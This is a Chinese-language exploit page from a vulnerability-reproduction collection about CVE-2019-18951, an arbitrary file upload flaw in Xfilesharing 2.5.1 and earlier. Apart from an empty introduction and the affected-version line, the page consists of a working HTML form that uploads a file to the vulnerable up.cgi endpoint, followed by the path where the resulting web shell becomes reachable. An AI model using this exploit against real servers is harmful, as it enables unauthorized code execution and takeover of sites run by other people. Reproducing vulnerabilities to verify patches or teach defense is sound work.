menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 142-Xfilesharing chevron_right 001-CVE-2019-18951 Xfilesharing 2.5.1本地文件上传getshell.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-CVE-2019-18951 Xfilesharing 2.5.1本地文件上传getshell.md
    472 B / 2021-07-17 00:01:22
        # CVE-2019-18951 Xfilesharing 2.5.1本地文件上传getshell
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    Version: <=2.5.1
    
    ### 三、复现过程
    
    任意文件上传
    
    
    ```html
    <form action="http://url/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
        <input type="text" name="sid" value="joe">
        <input type="file" name="file">
        <input type="submit" value="Upload" name="submit">
    </form>
    ```
    
    Shell地址 : `http://url/cgi-bin/temp/joe/shell.php`
    
    links
    file_download